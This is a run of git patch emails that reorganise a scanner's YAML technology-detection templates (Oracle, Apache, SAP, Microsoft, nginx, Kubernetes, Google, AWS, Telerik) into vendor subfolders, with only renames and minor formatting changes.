b/technologies/oracle/default-oracle-application-page.yaml @@ -4,13 +4,14 @@ info: name: Oracle Application Server Containers author: dhiyaneshDk severity: info - tags: tech,oracle reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22 + tags: tech,oracle requests: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: From 9feadf453522eb6b7cdf4d4acf5e328d61afbbbd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:02:24 +0530 Subject: [PATCH 203/339] Update and rename technologies/oracle-iplanet-web-server.yaml to technologies/oracle/oracle-iplanet-web-server.yaml --- technologies/{ => oracle}/oracle-iplanet-web-server.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename technologies/{ => oracle}/oracle-iplanet-web-server.yaml (91%) diff --git a/technologies/oracle-iplanet-web-server.yaml b/technologies/oracle/oracle-iplanet-web-server.yaml similarity index 91% rename from technologies/oracle-iplanet-web-server.yaml rename to technologies/oracle/oracle-iplanet-web-server.yaml index 12d06c6232..df262b7c1e 100644 --- a/technologies/oracle-iplanet-web-server.yaml +++ b/technologies/oracle/oracle-iplanet-web-server.yaml @@ -16,10 +16,10 @@ requests: matchers-condition: and matchers: - type: word - part: body words: - "Oracle iPlanet Web Server" + part: body - type: status status: - - 200 \ No newline at end of file + - 200 From fa4f2ee50db8f011a9dc6514279a1d0c70ab60f2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:04:32 +0530 Subject: [PATCH 204/339] Update and rename technologies/adobe-coldfusion-detector-error.yaml to technologies/adobe/adobe-coldfusion-detect.yaml --- .../adobe-coldfusion-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{adobe-coldfusion-detector-error.yaml => adobe/adobe-coldfusion-detect.yaml} (93%) diff --git a/technologies/adobe-coldfusion-detector-error.yaml b/technologies/adobe/adobe-coldfusion-detect.yaml similarity index 93% rename from technologies/adobe-coldfusion-detector-error.yaml rename to technologies/adobe/adobe-coldfusion-detect.yaml index ef5d2b03b2..890cc265ce 100644 --- a/technologies/adobe-coldfusion-detector-error.yaml +++ b/technologies/adobe/adobe-coldfusion-detect.yaml @@ -1,4 +1,4 @@ -id: adobe-coldfusion-detector-error +id: adobe-coldfusion-detect info: name: Adobe ColdFusion Detector From 801a048b9ca7b4813d8879cc38519bc3c1e3e67d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:05:35 +0530 Subject: [PATCH 205/339] Update and rename adobe-coldfusion-detect.yaml to adobe-coldfusion-error-detect.yaml --- ...oldfusion-detect.yaml => adobe-coldfusion-error-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/adobe/{adobe-coldfusion-detect.yaml => adobe-coldfusion-error-detect.yaml} (94%) diff --git a/technologies/adobe/adobe-coldfusion-detect.yaml b/technologies/adobe/adobe-coldfusion-error-detect.yaml similarity index 94% rename from technologies/adobe/adobe-coldfusion-detect.yaml rename to technologies/adobe/adobe-coldfusion-error-detect.yaml index 890cc265ce..c6e8e0d1ea 100644 --- a/technologies/adobe/adobe-coldfusion-detect.yaml +++ b/technologies/adobe/adobe-coldfusion-error-detect.yaml @@ -1,4 +1,4 @@ -id: adobe-coldfusion-detect +id: adobe-coldfusion-error-detect info: name: Adobe ColdFusion Detector From c84dee1ce1643c8b67da17e4e2d7e8f66e5f8942 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:06:01 +0530 Subject: [PATCH 206/339] Update and rename adobe-coldfusion-detector.yaml to adobe-coldfusion-detect.yaml --- ...-coldfusion-detector.yaml => adobe-coldfusion-detect.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename technologies/{adobe-coldfusion-detector.yaml => adobe-coldfusion-detect.yaml} (97%) diff --git a/technologies/adobe-coldfusion-detector.yaml b/technologies/adobe-coldfusion-detect.yaml similarity index 97% rename from technologies/adobe-coldfusion-detector.yaml rename to technologies/adobe-coldfusion-detect.yaml index 9dee636d31..0d9330c87c 100644 --- a/technologies/adobe-coldfusion-detector.yaml +++ b/technologies/adobe-coldfusion-detect.yaml @@ -1,4 +1,4 @@ -id: adobe-coldfusion-detector +id: adobe-coldfusion-detect info: name: Adobe ColdFusion Detector @@ -59,4 +59,4 @@ requests: - type: dsl name: "coldfusion-mx-7" dsl: - - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" \ No newline at end of file + - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" From b865f30ac856d5cd73adeca1cc0a15835b40b2e9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:06:48 +0530 Subject: [PATCH 207/339] Rename technologies/apache-axis-detect.yaml to technologies/apache/apache-axis-detect.yaml --- technologies/{ => apache}/apache-axis-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/apache-axis-detect.yaml (100%) diff --git a/technologies/apache-axis-detect.yaml b/technologies/apache/apache-axis-detect.yaml similarity index 100% rename from technologies/apache-axis-detect.yaml rename to technologies/apache/apache-axis-detect.yaml From 2fef2e3cec34c6ded30d49c4b6b136310ec0e0e1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:16 +0530 Subject: [PATCH 208/339] Rename technologies/apache-detect.yaml to technologies/apache/apache-detect.yaml --- technologies/{ => apache}/apache-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => apache}/apache-detect.yaml (96%) diff --git a/technologies/apache-detect.yaml b/technologies/apache/apache-detect.yaml similarity index 96% rename from technologies/apache-detect.yaml rename to technologies/apache/apache-detect.yaml index 4db33ceb08..eeb8966be3 100644 --- a/technologies/apache-detect.yaml +++ b/technologies/apache/apache-detect.yaml @@ -27,4 +27,4 @@ requests: - type: kval part: header kval: - - Server \ No newline at end of file + - Server From 364a825318fa52d346ce6a2d2bef2af27f257ccd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:25 +0530 Subject: [PATCH 209/339] Rename technologies/apache-guacamole.yaml to technologies/apache/apache-guacamole.yaml --- technologies/{ => apache}/apache-guacamole.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/apache-guacamole.yaml (100%) diff --git a/technologies/apache-guacamole.yaml b/technologies/apache/apache-guacamole.yaml similarity index 100% rename from technologies/apache-guacamole.yaml rename to technologies/apache/apache-guacamole.yaml From a2cb1b2882fd5d143673d36b6c4b56191e1b2d8c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:35 +0530 Subject: [PATCH 210/339] Rename technologies/default-apache-test-page.yaml to technologies/apache/default-apache-test-page.yaml --- technologies/{ => apache}/default-apache-test-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-apache-test-page.yaml (100%) diff --git a/technologies/default-apache-test-page.yaml b/technologies/apache/default-apache-test-page.yaml similarity index 100% rename from technologies/default-apache-test-page.yaml rename to technologies/apache/default-apache-test-page.yaml From dc95ae40fa64e549d46d678709354051fe7467fd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:43 +0530 Subject: [PATCH 211/339] Rename technologies/default-apache2-page.yaml to technologies/apache/default-apache2-page.yaml --- technologies/{ => apache}/default-apache2-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-apache2-page.yaml (100%) diff --git a/technologies/default-apache2-page.yaml b/technologies/apache/default-apache2-page.yaml similarity index 100% rename from technologies/default-apache2-page.yaml rename to technologies/apache/default-apache2-page.yaml From c561f96d27be85790f7e46ceea9b0e5f2b161a70 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:50 +0530 Subject: [PATCH 212/339] Rename technologies/default-apache2-ubuntu-page.yaml to technologies/apache/default-apache2-ubuntu-page.yaml --- technologies/{ => apache}/default-apache2-ubuntu-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-apache2-ubuntu-page.yaml (100%) diff --git a/technologies/default-apache2-ubuntu-page.yaml b/technologies/apache/default-apache2-ubuntu-page.yaml similarity index 100% rename from technologies/default-apache2-ubuntu-page.yaml rename to technologies/apache/default-apache2-ubuntu-page.yaml From a0ff68f00555fbb2ae03ae3168c422e22a7032c3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:08:32 +0530 Subject: [PATCH 213/339] Rename technologies/sap-igs-detect.yaml to technologies/sap/sap-igs-detect.yaml --- technologies/{ => sap}/sap-igs-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => sap}/sap-igs-detect.yaml (100%) diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap/sap-igs-detect.yaml similarity index 100% rename from technologies/sap-igs-detect.yaml rename to technologies/sap/sap-igs-detect.yaml From b32c7eb44d9e4f3f05017634a1f8e5b03f2629dc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:08:50 +0530 Subject: [PATCH 214/339] Rename technologies/sap-netweaver-detect.yaml to technologies/sap/sap-netweaver-detect.yaml --- technologies/{ => sap}/sap-netweaver-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => sap}/sap-netweaver-detect.yaml (100%) diff --git a/technologies/sap-netweaver-detect.yaml b/technologies/sap/sap-netweaver-detect.yaml similarity index 100% rename from technologies/sap-netweaver-detect.yaml rename to technologies/sap/sap-netweaver-detect.yaml From cd29d6bcecefb12cb31290ea220e02d5371eca96 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:08:56 +0530 Subject: [PATCH 215/339] Rename technologies/sap-netweaver-webgui.yaml to technologies/sap/sap-netweaver-webgui.yaml --- technologies/{ => sap}/sap-netweaver-webgui.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => sap}/sap-netweaver-webgui.yaml (95%) diff --git a/technologies/sap-netweaver-webgui.yaml b/technologies/sap/sap-netweaver-webgui.yaml similarity index 95% rename from technologies/sap-netweaver-webgui.yaml rename to technologies/sap/sap-netweaver-webgui.yaml index ca76355018..6562effe35 100644 --- a/technologies/sap-netweaver-webgui.yaml +++ b/technologies/sap/sap-netweaver-webgui.yaml @@ -20,4 +20,4 @@ requests: words: - "sap-system-login" - "Logon" - condition: or \ No newline at end of file + condition: or From 3594025e4d785c241ac207bda8971a2c2e46411a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:03 +0530 Subject: [PATCH 216/339] Rename technologies/sap-web-dispatcher-admin-portal.yaml to technologies/sap/sap-web-dispatcher-admin-portal.yaml --- technologies/{ => sap}/sap-web-dispatcher-admin-portal.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => sap}/sap-web-dispatcher-admin-portal.yaml (94%) diff --git a/technologies/sap-web-dispatcher-admin-portal.yaml b/technologies/sap/sap-web-dispatcher-admin-portal.yaml similarity index 94% rename from technologies/sap-web-dispatcher-admin-portal.yaml rename to technologies/sap/sap-web-dispatcher-admin-portal.yaml index f6f7c62464..1d5183b56a 100644 --- a/technologies/sap-web-dispatcher-admin-portal.yaml +++ b/technologies/sap/sap-web-dispatcher-admin-portal.yaml @@ -35,4 +35,4 @@ requests: condition: or words: - "SAP Web Dispatcher" - - "Administration" \ No newline at end of file + - "Administration" From ce8a9c5098a120e3a331d4922c8f1f0637aa38f9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:09 +0530 Subject: [PATCH 217/339] Rename technologies/sap-web-dispatcher.yaml to technologies/sap/sap-web-dispatcher.yaml --- technologies/{ => sap}/sap-web-dispatcher.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => sap}/sap-web-dispatcher.yaml (100%) diff --git a/technologies/sap-web-dispatcher.yaml b/technologies/sap/sap-web-dispatcher.yaml similarity index 100% rename from technologies/sap-web-dispatcher.yaml rename to technologies/sap/sap-web-dispatcher.yaml From 3991fac5e3390ee055110b01d062ec528fdb2fa0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:30 +0530 Subject: [PATCH 218/339] Rename technologies/adobe-coldfusion-detect.yaml to technologies/adobe/adobe-coldfusion-detect.yaml --- technologies/{ => adobe}/adobe-coldfusion-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => adobe}/adobe-coldfusion-detect.yaml (100%) diff --git a/technologies/adobe-coldfusion-detect.yaml b/technologies/adobe/adobe-coldfusion-detect.yaml similarity index 100% rename from technologies/adobe-coldfusion-detect.yaml rename to technologies/adobe/adobe-coldfusion-detect.yaml From 16db1dc76ae2f89a52b2d81c17d309bc8f58453f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:47 +0530 Subject: [PATCH 219/339] Rename technologies/airflow-detect.yaml to technologies/apache/airflow-detect.yaml --- technologies/{ => apache}/airflow-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => apache}/airflow-detect.yaml (95%) diff --git a/technologies/airflow-detect.yaml b/technologies/apache/airflow-detect.yaml similarity index 95% rename from technologies/airflow-detect.yaml rename to technologies/apache/airflow-detect.yaml index f2d6d97aa2..5306691e5b 100644 --- a/technologies/airflow-detect.yaml +++ b/technologies/apache/airflow-detect.yaml @@ -21,4 +21,4 @@ requests: - type: status status: - - 404 \ No newline at end of file + - 404 From aca84e760f971a87ac6f82d85c5f5361df49b6d2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:11:52 +0530 Subject: [PATCH 220/339] Rename technologies/default-iis7-page.yaml to technologies/microsoft/default-iis7-page.yaml --- technologies/{ => microsoft}/default-iis7-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/default-iis7-page.yaml (100%) diff --git a/technologies/default-iis7-page.yaml b/technologies/microsoft/default-iis7-page.yaml similarity index 100% rename from technologies/default-iis7-page.yaml rename to technologies/microsoft/default-iis7-page.yaml From 09b8c69166d823240a5733b9893d05b98efdb32c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:11:59 +0530 Subject: [PATCH 221/339] Rename technologies/default-microsoft-azure-page.yaml to technologies/microsoft/default-microsoft-azure-page.yaml --- technologies/{ => microsoft}/default-microsoft-azure-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/default-microsoft-azure-page.yaml (100%) diff --git a/technologies/default-microsoft-azure-page.yaml b/technologies/microsoft/default-microsoft-azure-page.yaml similarity index 100% rename from technologies/default-microsoft-azure-page.yaml rename to technologies/microsoft/default-microsoft-azure-page.yaml From 670f3b67c0bd091d3a04e0d54453511356325a3a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:12:16 +0530 Subject: [PATCH 222/339] Rename technologies/default-windows-server-page.yaml to technologies/microsoft/default-windows-server-page.yaml --- technologies/{ => microsoft}/default-windows-server-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/default-windows-server-page.yaml (100%) diff --git a/technologies/default-windows-server-page.yaml b/technologies/microsoft/default-windows-server-page.yaml similarity index 100% rename from technologies/default-windows-server-page.yaml rename to technologies/microsoft/default-windows-server-page.yaml From 8a90299591b0540b134c4ff2d02b6847ff3d7716 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:12:30 +0530 Subject: [PATCH 223/339] Rename technologies/microsoft-exchange-server-detect.yaml to technologies/microsoft/microsoft-exchange-server-detect.yaml --- .../{ => microsoft}/microsoft-exchange-server-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/microsoft-exchange-server-detect.yaml (100%) diff --git a/technologies/microsoft-exchange-server-detect.yaml b/technologies/microsoft/microsoft-exchange-server-detect.yaml similarity index 100% rename from technologies/microsoft-exchange-server-detect.yaml rename to technologies/microsoft/microsoft-exchange-server-detect.yaml From 761dff10b2021cb71c4d9f928bca301eff69eb2c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:13:07 +0530 Subject: [PATCH 224/339] Rename technologies/nginx-linux-page.yaml to technologies/nginx/nginx-linux-page.yaml --- technologies/{ => nginx}/nginx-linux-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => nginx}/nginx-linux-page.yaml (100%) diff --git a/technologies/nginx-linux-page.yaml b/technologies/nginx/nginx-linux-page.yaml similarity index 100% rename from technologies/nginx-linux-page.yaml rename to technologies/nginx/nginx-linux-page.yaml From 276ae59db8de482790d29f0ef427f4262bf8709d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:13:13 +0530 Subject: [PATCH 225/339] Rename technologies/nginx-version.yaml to technologies/nginx/nginx-version.yaml --- technologies/{ => nginx}/nginx-version.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => nginx}/nginx-version.yaml (100%) diff --git a/technologies/nginx-version.yaml b/technologies/nginx/nginx-version.yaml similarity index 100% rename from technologies/nginx-version.yaml rename to technologies/nginx/nginx-version.yaml From 76c6650c233c5e69df23a400fcecaf573072286f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:13:19 +0530 Subject: [PATCH 226/339] Rename technologies/default-nginx-page.yaml to technologies/nginx/default-nginx-page.yaml --- technologies/{ => nginx}/default-nginx-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => nginx}/default-nginx-page.yaml (100%) diff --git a/technologies/default-nginx-page.yaml b/technologies/nginx/default-nginx-page.yaml similarity index 100% rename from technologies/default-nginx-page.yaml rename to technologies/nginx/default-nginx-page.yaml From 514281db511b73c433f7bbf5674337aaed4b38b9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:14:11 +0530 Subject: [PATCH 227/339] Rename technologies/oracle-http-server-12c.yaml to technologies/oracle/oracle-http-server-12c.yaml --- technologies/{ => oracle}/oracle-http-server-12c.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => oracle}/oracle-http-server-12c.yaml (100%) diff --git a/technologies/oracle-http-server-12c.yaml b/technologies/oracle/oracle-http-server-12c.yaml similarity index 100% rename from technologies/oracle-http-server-12c.yaml rename to technologies/oracle/oracle-http-server-12c.yaml From 7e10e338d863004c6c9e173f461e68562e8250f3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:14:19 +0530 Subject: [PATCH 228/339] Rename technologies/oracle-iplanet-web-server.yaml to technologies/oracle/oracle-iplanet-web-server.yaml --- technologies/{ => oracle}/oracle-iplanet-web-server.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => oracle}/oracle-iplanet-web-server.yaml (91%) diff --git a/technologies/oracle-iplanet-web-server.yaml b/technologies/oracle/oracle-iplanet-web-server.yaml similarity index 91% rename from technologies/oracle-iplanet-web-server.yaml rename to technologies/oracle/oracle-iplanet-web-server.yaml index 12d06c6232..6d080503e1 100644 --- a/technologies/oracle-iplanet-web-server.yaml +++ b/technologies/oracle/oracle-iplanet-web-server.yaml @@ -22,4 +22,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 6c4d6a5abbd5e0561b1b20dc67ef90184a7397f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:14:25 +0530 Subject: [PATCH 229/339] Rename technologies/default-oracle-application-page.yaml to technologies/oracle/default-oracle-application-page.yaml --- technologies/{ => oracle}/default-oracle-application-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => oracle}/default-oracle-application-page.yaml (100%) diff --git a/technologies/default-oracle-application-page.yaml b/technologies/oracle/default-oracle-application-page.yaml similarity index 100% rename from technologies/default-oracle-application-page.yaml rename to technologies/oracle/default-oracle-application-page.yaml From c03dcd01784ae788b340f0a1d7f873ca8241adf0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:15:01 +0530 Subject: [PATCH 230/339] Rename technologies/default-tomcat-page.yaml to technologies/apache/default-tomcat-page.yaml --- technologies/{ => apache}/default-tomcat-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-tomcat-page.yaml (100%) diff --git a/technologies/default-tomcat-page.yaml b/technologies/apache/default-tomcat-page.yaml similarity index 100% rename from technologies/default-tomcat-page.yaml rename to technologies/apache/default-tomcat-page.yaml From 487e5e421645c17c5706ff93f8ce2de5073a501b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:15:10 +0530 Subject: [PATCH 231/339] Rename technologies/tomcat-detect.yaml to technologies/apache/tomcat-detect.yaml --- technologies/{ => apache}/tomcat-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/tomcat-detect.yaml (100%) diff --git a/technologies/tomcat-detect.yaml b/technologies/apache/tomcat-detect.yaml similarity index 100% rename from technologies/tomcat-detect.yaml rename to technologies/apache/tomcat-detect.yaml From d0bd1bbcee3258dc7d9331e25cd214edfe2656ee Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:16:20 +0530 Subject: [PATCH 232/339] Rename technologies/kubernetes-version.yaml to technologies/kubernetes/kubernetes-version.yaml --- technologies/{ => kubernetes}/kubernetes-version.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => kubernetes}/kubernetes-version.yaml (100%) diff --git a/technologies/kubernetes-version.yaml b/technologies/kubernetes/kubernetes-version.yaml similarity index 100% rename from technologies/kubernetes-version.yaml rename to technologies/kubernetes/kubernetes-version.yaml From 1849797fea846f94379f2916b322ca288a3dd666 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:16:27 +0530 Subject: [PATCH 233/339] Rename technologies/kubernetes-mirantis.yaml to technologies/kubernetes/kubernetes-mirantis.yaml --- technologies/{ => kubernetes}/kubernetes-mirantis.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => kubernetes}/kubernetes-mirantis.yaml (91%) diff --git a/technologies/kubernetes-mirantis.yaml b/technologies/kubernetes/kubernetes-mirantis.yaml similarity index 91% rename from technologies/kubernetes-mirantis.yaml rename to technologies/kubernetes/kubernetes-mirantis.yaml index 34516924bc..f823c86fb8 100644 --- a/technologies/kubernetes-mirantis.yaml +++ b/technologies/kubernetes/kubernetes-mirantis.yaml @@ -22,4 +22,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 444e8af25a1ffb8466e0c1b1c5c5eef7685472a6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:16:33 +0530 Subject: [PATCH 234/339] Rename technologies/kubernetes-enterprise-manager.yaml to technologies/kubernetes/kubernetes-enterprise-manager.yaml --- .../{ => kubernetes}/kubernetes-enterprise-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => kubernetes}/kubernetes-enterprise-manager.yaml (91%) diff --git a/technologies/kubernetes-enterprise-manager.yaml b/technologies/kubernetes/kubernetes-enterprise-manager.yaml similarity index 91% rename from technologies/kubernetes-enterprise-manager.yaml rename to technologies/kubernetes/kubernetes-enterprise-manager.yaml index 3a22e2d120..137e4062a7 100644 --- a/technologies/kubernetes-enterprise-manager.yaml +++ b/technologies/kubernetes/kubernetes-enterprise-manager.yaml @@ -22,4 +22,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 5d6ac2f090372b5a4c448cb617b2b8a406a26027 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:17:32 +0530 Subject: [PATCH 235/339] Rename technologies/google-bucket-service.yaml to technologies/google/google-bucket-service.yaml --- technologies/{ => google}/google-bucket-service.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => google}/google-bucket-service.yaml (97%) diff --git a/technologies/google-bucket-service.yaml b/technologies/google/google-bucket-service.yaml similarity index 97% rename from technologies/google-bucket-service.yaml rename to technologies/google/google-bucket-service.yaml index f8fe51f476..581c71ab67 100644 --- a/technologies/google-bucket-service.yaml +++ b/technologies/google/google-bucket-service.yaml @@ -22,4 +22,4 @@ requests: - contains(tolower(all_headers), 'x-goog-stored-content-length') - contains(tolower(all_headers), 'x-guploader-uploadid') part: header - condition: or \ No newline at end of file + condition: or From f5c68c8dcd81922f3aedf4bf76ddb86d5591d35c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:17:39 +0530 Subject: [PATCH 236/339] Rename technologies/google-storage.yaml to technologies/google/google-storage.yaml --- technologies/{ => google}/google-storage.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => google}/google-storage.yaml (93%) diff --git a/technologies/google-storage.yaml b/technologies/google/google-storage.yaml similarity index 93% rename from technologies/google-storage.yaml rename to technologies/google/google-storage.yaml index 95963c6a8c..a36c7baded 100644 --- a/technologies/google-storage.yaml +++ b/technologies/google/google-storage.yaml @@ -15,4 +15,4 @@ requests: words: - x-goog-metageneration - X-Goog-Metageneration - part: header \ No newline at end of file + part: header From c82bced598f9158b50fd09e02fcf50a79012750e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:19:04 +0530 Subject: [PATCH 237/339] Rename technologies/sql-server-reporting.yaml to technologies/microsoft/sql-server-reporting.yaml --- technologies/{ => microsoft}/sql-server-reporting.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/sql-server-reporting.yaml (100%) diff --git a/technologies/sql-server-reporting.yaml b/technologies/microsoft/sql-server-reporting.yaml similarity index 100% rename from technologies/sql-server-reporting.yaml rename to technologies/microsoft/sql-server-reporting.yaml From 53cf6811f46a0937a9bca466da1c81ca759c0dfc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:21:42 +0530 Subject: [PATCH 238/339] Rename technologies/firebase-detect.yaml to technologies/google/firebase-detect.yaml --- technologies/{ => google}/firebase-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => google}/firebase-detect.yaml (100%) diff --git a/technologies/firebase-detect.yaml b/technologies/google/firebase-detect.yaml similarity index 100% rename from technologies/firebase-detect.yaml rename to technologies/google/firebase-detect.yaml From d75199919af504802d0e20edae954f5be8cc9c37 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:21:49 +0530 Subject: [PATCH 239/339] Rename technologies/firebase-urls.yaml to technologies/google/firebase-urls.yaml --- technologies/{ => google}/firebase-urls.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => google}/firebase-urls.yaml (96%) diff --git a/technologies/firebase-urls.yaml b/technologies/google/firebase-urls.yaml similarity index 96% rename from technologies/firebase-urls.yaml rename to technologies/google/firebase-urls.yaml index 67a05cefcb..18f0ab9edd 100644 --- a/technologies/firebase-urls.yaml +++ b/technologies/google/firebase-urls.yaml @@ -20,4 +20,4 @@ requests: - type: regex regex: - ".*?(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?" - part: body \ No newline at end of file + part: body From 963f0a7d310a5925cf28b775f7be537edefd853c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:23:22 +0530 Subject: [PATCH 240/339] Rename technologies/aws-bucket-service.yaml to technologies/aws/aws-bucket-service.yaml --- technologies/{ => aws}/aws-bucket-service.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => aws}/aws-bucket-service.yaml (96%) diff --git a/technologies/aws-bucket-service.yaml b/technologies/aws/aws-bucket-service.yaml similarity index 96% rename from technologies/aws-bucket-service.yaml rename to technologies/aws/aws-bucket-service.yaml index b3eacd8135..ad824b8670 100644 --- a/technologies/aws-bucket-service.yaml +++ b/technologies/aws/aws-bucket-service.yaml @@ -26,4 +26,4 @@ requests: dsl: - contains(tolower(all_headers), 'x-guploader-uploadid') part: header - negative: true \ No newline at end of file + negative: true From d0dbf4eaf08cf876e3d89aea683b98a43c4dd211 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:23:56 +0530 Subject: [PATCH 241/339] Rename technologies/telerik-dialoghandler-detect.yaml to technologies/telerik/telerik-dialoghandler-detect.yaml --- technologies/{ => telerik}/telerik-dialoghandler-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => telerik}/telerik-dialoghandler-detect.yaml (100%) diff --git a/technologies/telerik-dialoghandler-detect.yaml b/technologies/telerik/telerik-dialoghandler-detect.yaml similarity index 100% rename from technologies/telerik-dialoghandler-detect.yaml rename to technologies/telerik/telerik-dialoghandler-detect.yaml From ee5b86d40e3cd130e6869e404304e941b7e5b650 Mon Sep 17 00:00:00 2001 From: Prince Chaddha 